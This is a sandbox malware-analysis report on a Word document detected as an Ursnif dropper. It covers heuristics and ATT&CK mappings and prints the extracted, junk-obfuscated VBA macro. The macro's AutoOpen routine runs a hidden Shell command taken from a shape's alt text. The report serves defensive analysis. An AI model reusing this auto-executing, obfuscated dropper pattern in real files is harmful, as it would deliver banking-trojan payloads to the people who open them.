MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute external code. ClamAV detection confirms this as Ursnif, a known banking trojan. The macro likely downloads and executes a second-stage payload, consistent with Ursnif's typical behavior.
Heuristics 6
-
ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11907 bytes |
SHA-256: 6520457ad58e03c9137d89448fc745bf176dafa74c4cf0cdd07842395186f1d1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lnumiha"
Sub AutoOpen()
Zxrzx = -66700
xjyz = "WkSz"
rdetojuq = 16663.3
pwuwarul = -93930 - Zxrzx
ddemupoly = "WkSz"
ThLKBgfW = 78670.6 - rdetojuq
lNLvK = -4382
Mrfvs = "KpPlK"
BWZyFs = 58483.5
lxazolo = -24721 - lNLvK
vrucyqavac = "KpPlK"
cTNKtlC = 10454.1 - BWZyFs
GqdzvCL = -84670
snatyt = "nqQeyaezSLpQb"
ayegf = 37921.3
xzamycu = -55902 - GqdzvCL
scHBtKA = "nqQeyaezSLpQb"
aaOfqZ = 15321.8 - ayegf
clfNOZ = -57476
kdivumohu = "eGCagkpIWuVQIL"
dqib = 13935.7
GlCsULcb = -61445 - clfNOZ
wWhdtSA = "eGCagkpIWuVQIL"
rmubakitowe = 73767.5 - dqib
vruhijiki = -24504
oNzjXuh = "UissTBEQDermql"
qjnGq = 88403.9
GEjGW = -8108 - vruhijiki
nJodXQI = "UissTBEQDermql"
hnulo = 73790.6 - qjnGq
hivWV = ActiveDocument.Shapes("qbezucagi").AlternativeText
tdiw = -27264
Cofmcp = "EZNopVQSywnQYVg"
BkrvvcT = 51421.9
FpTKsk = -23826 - tdiw
zselowywax = "EZNopVQSywnQYVg"
DKMRwJx = 99421.5 - BkrvvcT
vlzTGuX = -57637
ZguHgOmc = "mdxhtCfLg"
AOluo = 16786.4
mdivita = -37484 - vlzTGuX
wruroguboxa = "mdxhtCfLg"
acYRx = 92303.7 - AOluo
QIbpusij = -96003
BBypGmIP = "myCU"
rfypyheto = 99448.3
sKuXzI = -21640 - QIbpusij
tdgSa = "myCU"
wceranymuga = 87818.9 - rfypyheto
cnylymilani = -59133
vtWZSgUm = "OPOs"
WbMEXpb = 85808.7
WshWjzZT = -59276 - cnylymilani
dvyruqe = "OPOs"
IycGt = 27663.1 - WbMEXpb
lJtRaxKj = -56611
btyzif = "xGQfoDSSbbcjEpRV"
YuctqCN = 40958.5
jzomi = -48495 - lJtRaxKj
cwiryg = "xGQfoDSSbbcjEpRV"
jhih = 25793.2 - YuctqCN
Shell$ hivWV, vbHide
qzegoroci = -96350
VfWaJqh = "uuRRdgtepofzeX"
mguq = 18306.4
bnuVCt = -45227 - qzegoroci
UewxJ = "uuRRdgtepofzeX"
YlMJqED = 10582.3 - mguq
PGuTbF = -62416
VSKelD = "BPkDTBnje"
vdXPLgL = 87154.9
aqyfPvvD = -9281 - PGuTbF
lpah = "BPkDTBnje"
bAWAK = 73512.3 - vdXPLgL
udoFOCo = -9105
mrupebeq = "RBFyZngAqNetApEUC"
lyRPD = 81595.8
isnHub = -26829 - udoFOCo
sfunudilyb = "RBFyZngAqNetApEUC"
xNVtxMgz = 57462.8 - lyRPD
QAVgHM = -14065
pkafykavoz = "yhhZKuull"
kpykibar = 82656.7
pbyx = -30833 - QAVgHM
icjkt = "yhhZKuull"
PNeIIkIp = 19615.2 - kpykibar
RjNEjFui = -83294
xnydaqu = "IUsPmbOzAHVqjWWZZ"
aNdfIe = 33186.4
EiIfLWYR = -69942 - RjNEjFui
xkihip = "IUsPmbOzAHVqjWWZZ"
claXtRGm = 11973.7 - aNdfIe
wzoDmj = -67211
rdow = "TubiuGh"
cnasetevagy = 39349.1
fmelupyda = -25571 - wzoDmj
djajabirif = "TubiuGh"
dnidope = 47566.5 - cnasetevagy
svykesomage = -79173
KJneI = "RCupYUyumgpmUuScT"
ZZvYGggJ = 74108.1
kqefog = -72522 - svykesomage
TZMuxq = "RCupYUyumgpmUuScT"
qxil = 49972.7 - ZZvYGggJ
End Sub
' Processing file: /opt/analyzer/scan_staging/66dde291d39849dfbb19a613f88e79ce.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1097 bytes
' Macros/VBA/lnumiha - 7467 bytes
' Line #0:
' FuncDefn (Sub pwuwarul())
' Line #1:
' Line #2:
' Line #3:
' LitDI4 0x048C 0x0001
' UMi
' St ddemupoly
' Line #4:
' Line #5:
' LitStr 0x0004 "WkSz"
' St ThLKBgfW
' Line #6:
' Line #7:
' LitR8 0x3333 0x3333 0x45D3 0x40D0
' St lNLvK
' Line #8:
' Line #9:
' LitDI4 0x6EEA 0x0001
' UMi
' Ld ddemupoly
' Sub
' St Mrfvs
' Line #10:
' Line #11:
' LitStr 0x0004 "WkSz"
' St BWZyFs
' Line #12:
' Line #13:
' LitR8 0x999A 0x9999 0x34E9 0x40F3
' Ld lNLvK
' Sub
' St lxazolo
' Line #14:
' Line #15:
' LitDI2 0x111E
' UMi
' St vrucyqavac
' Line #16:
' Line #17:
' LitStr 0x0005 "KpPlK"
' St cTNKtlC
' Line #18:
' Line #19:
' LitR8 0x0000 0x0000 0x8E70 0x40EC
' St GqdzvCL
' Line #20:
' Line #21:
' LitDI2 0x6091
' U
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.